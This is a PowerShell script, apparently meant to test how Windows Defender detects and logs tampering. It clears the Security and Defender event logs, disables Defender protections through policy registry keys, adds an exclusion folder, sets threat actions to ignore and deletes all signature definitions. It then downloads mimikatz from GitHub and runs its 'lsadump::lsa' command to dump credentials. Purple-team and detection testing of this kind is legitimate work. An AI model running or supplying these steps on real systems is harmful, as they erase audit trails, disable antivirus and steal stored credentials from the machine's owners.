# Group Policy
$EventLogs = @(
  "Microsoft-Windows-Windows Defender/Operational"
  "Microsoft-Windows-Windows Defender/WHC"
  "Application"
  "System"
  "Security"
)
foreach ($EventLogName in $EventLogs) {
  & wevtutil cl "$EventLogName"
  Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") Eventlog `"$EventLogName`" was cleared"
}
Start-Sleep 60
$StartDate = $(Get-Date -Format "yyyy-MM-dd-HHmmss")
# Start configuration changes
Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") Start configuration changes"
# 1.1 Disable virus and threat protection
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name 'Real-Time Protection' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name DisableIOAVProtection -Value 1 -PropertyType DWord -Force

New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name 'Scan' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" -Name DisableEmailScanning -Value 1 -PropertyType DWord -Force

New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name 'Spynet' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name DisableBlockAtFirstSeen -Value 1 -PropertyType DWord -Force
# Apply configuration changes
gpupdate /force
Start-Sleep 60
# 1.2 Disable real-time protection
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name 'Real-Time Protection' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name DisableRealtimeMonitoring -Value 1 -PropertyType DWord -Force
# Apply configuration changes
gpupdate /force
Start-Sleep 60
# 1.3 Turning off behavior monitoring
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name 'DisableBehaviorMonitoring' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\DisableBehaviorMonitoring" -Name DisableBehaviorMonitoring -Value 1 -PropertyType DWord -Force
# Apply configuration changes
gpupdate /force
Start-Sleep 60
# 1.4 Disable cloud-delivered protection
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name 'Spynet' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name SpynetReporting -Value 0 -PropertyType DWord -Force
# Apply configuration changes
gpupdate /force
Start-Sleep 60
# 1.5 Disable signature updates
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name 'Signature Updates' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" -Name SharedSignatureRoot -Value "" -PropertyType String -Force
# Apply configuration changes
gpupdate /force
Start-Sleep 60
# 1.6 Add exclusions path*
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" -Name 'Paths' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" -Name Exclusions_Paths -Value 1 -PropertyType DWord -Force
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" -Name "C:\AVTest" -Value 0 -PropertyType String -Force
# Apply configuration changes
gpupdate /force
Start-Sleep 60
# 1.7 Disable automatic actions on detected threats
New-Item -Path "HKLM:SOFTWARE\Policies\Microsoft\Windows Defender\Threats\" -Name 'ThreatSeverityDefaultAction' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:SOFTWARE\Policies\Microsoft\Windows Defender\Threats\" -Name 'Threats_ThreatSeverityDefaultAction' -Value 1 -PropertyType DWord -Force
1,2,4,5 | ForEach-Object {
    # 6 = Ignore
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" -Name $_ -Value 6 -PropertyType String -Force
}
# Apply configuration changes
gpupdate /force
Start-Sleep 60
# 1.8 Change default action for specific malware*
New-Item -Path "HKLM:SOFTWARE\Policies\Microsoft\Windows Defender\Threats\" -Name 'ThreatIdDefaultAction' -Force -ErrorAction 0
New-ItemProperty -Path "HKLM:SOFTWARE\Policies\Microsoft\Windows Defender\Threats\" -Name 'Threats_ThreatIdDefaultAction' -Value 1 -PropertyType DWord -Force
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" -Name "2147519003" -Value 6 -PropertyType String -Force
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" -Name "2147717805" -Value 6 -PropertyType String -Force
## Apply configuration changes
gpupdate /force
Start-Sleep 60
# 1.9 Removing security intelligence updates
& "$ENV:ProgramFiles\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Start-Sleep 60
# End of configuration
Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") Configuration done."

# Try to ppdate signatures
Update-MpSignature -Verbose
Start-Sleep 60

# Test detection of Eicar
$Paths = @("C:\AVTest\", "C:\AVTest2\")
foreach ($Path in $Paths) {
    New-Item -Type Directory -Path $Path -EA 0
    Set-Location $Path
    Write-Output 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' > eicartest.file

    Start-MpScan -ScanType CustomScan -ScanPath $Path
    Get-Content .\eicartest.file
    Start-Sleep 60
}

# Test detection of mimikatz
cd "C:\AVTest\"
$ProgressPreference = "SilentlyContinue"
[Net.ServicePointManager]::SecurityProtocol = ([Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12)
Invoke-WebRequest -Uri "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210810-2/mimikatz_trunk.zip"  -OutFile "mimikatz.zip"
Unblock-File "mimikatz.zip"
Expand-Archive -Path "mimikatz.zip" -DestinationPath .
# Execute mimikatz
.\x64\mimikatz.exe "lsadump::lsa" "exit"
# Scan folder
Start-MpScan -ScanType CustomScan -ScanPath "C:\AVTest\"
Start-Sleep 60

# Export event logs
foreach ($EventLogName in $EventLogs) {
  $FileName = $EventLogName -replace "/", '-'
  & wevtutil epl "$EventLogName" "C:\$($ENV:COMPUTERNAME)_$($FileName)-$($StartDate).evtx"
  Write-Output "$(Get-Date -Format "yyyy-MM-dd HH:mm:ss") Eventlog `"$EventLogName`" was exported to `"C:\$($ENV:COMPUTERNAME)_$($FileName)-$($StartDate).evtx`""
}